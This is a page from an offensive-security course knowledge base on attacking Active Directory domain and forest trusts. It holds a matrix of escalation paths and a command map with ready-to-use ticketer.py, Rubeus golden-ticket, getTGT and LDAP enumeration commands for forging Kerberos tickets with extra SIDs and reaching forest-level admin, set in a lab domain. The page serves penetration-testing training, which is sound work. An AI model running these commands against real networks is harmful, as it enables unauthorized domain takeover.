Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Trusts

Matrix

PathStarting positionRequired materialMain primitiveLinux flowWindows flowResult
Parent-child escalationDomain admin in a child domain inside the same forestChild domain krbtgt key, child domain SID, parent or root privileged group SIDForge a child-domain TGT with parent/root privileged SID in SIDHistorysecretsdump.py for child krbtgt, then ticketer.py -extra-sid <ROOT_SID>-519Rubeus.exe golden /sids:<ROOT_SID>-519 /ptt or mimikatz kerberos::goldenForest-level access if SID filtering does not block the extra SID inside the forest path
Inbound trust abuseWe control an account in the trusted domain and the target domain trusts that identity sourceCredential material for an eligible foreign principal or trust keyUse legitimate cross-domain access or forge an inter-realm referral ticketQuery foreign security principals, resolve SIDs, request cross-realm ticketsRubeus.exe asktgt, asktgs, or silver /service:krbtgt/<target>Access resources in the trusting domain where the foreign identity is authorized
Outbound trust enumerationWe are on the trusting side, against the access directionTrust account key from the TDO or credentials from the trusted domainUse the inter-realm key as the trust account to obtain a TGT in the trusted domaingetTGT.py <trusted>/<TRUSTING$> -hashes :<TRUST_RC4>DCSync TDO by GUID, then Rubeus.exe asktgt /user:<TRUSTING$>Enumerate the trusted domain as the trust account, usually equivalent to basic Domain Users visibility
Bidirectional trust huntingWe have any foothold in one trusted domainValid credentials and network path to both domainsEnumerate both sides for groups, ACLs, sessions, shares, ADCS, delegation, and roastable usersLDAP, NetExec, BloodHound collectorsPowerView, AD module, BloodHound collectorsFind the real cross-domain privilege edge
Foreign security principal abuseA foreign SID is a member of a group in the target domainControl of the matching source-domain principalResolve the SID back to its source-domain user or group and impersonate itLDAP query FSPs, resolve objectSid in source domainPowerView Get-DomainForeignGroupMemberAccess target-domain resources through legitimate group membership
SIDHistory abuseAccount has privileged or useful SIDs in sIDHistoryControl of that account or ability to add SIDHistoryKerberos PAC includes historical SIDs during authorizationLDAP search for sIDHistory=*, then validate accessGet-ADObject -LDAPFilter '(sIDHistory=*)'Access follows the historical SID unless filtered

Quick command map

GoalCommand
List trusts with LDAPldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=trustedDomain)' trustPartner trustDirection trustType trustAttributes flatName securityIdentifier
List trust accountsldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(samAccountType=805306370)' samAccountName distinguishedName userAccountControl
List foreign security principalsldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=foreignSecurityPrincipal)' cn memberOf distinguishedName
NetExec trustsnxc ldap $DC -d $DOMAIN -u $USER -p "$PASS" -M get-trusts
PowerView trustsGet-DomainTrust
PowerView trust mapGet-DomainTrustMapping
AD module trustsGet-ADTrust -Filter * -Properties *
BloodHound trustsbloodhound-python -d ootw.local -u student -p 'student' -ns 10.10.10.200 -c Trusts,DCOnly
Parent-child Linux ticketticketer.py -aesKey <CHILD_KRBTGT_AES256> -domain child.ootw.local -domain-sid <CHILD_SID> -extra-sid <ROOT_SID>-519 Administrator
Parent-child Windows ticketRubeus.exe golden /aes256:<CHILD_KRBTGT_AES256> /user:Administrator /domain:child.ootw.local /sid:<CHILD_SID> /sids:<ROOT_SID>-519 /ptt
Trust account TGTgetTGT.py trusted.local/'TRUSTING$' -hashes :<TRUST_RC4> -dc-ip <TRUSTED_DC>
Inter-realm TGSRubeus.exe asktgs /service:cifs/target.trusted.local /targetdomain:trusted.local /dc:trusted-dc.trusted.local /ticket:<INTER_REALM_TGT> /ptt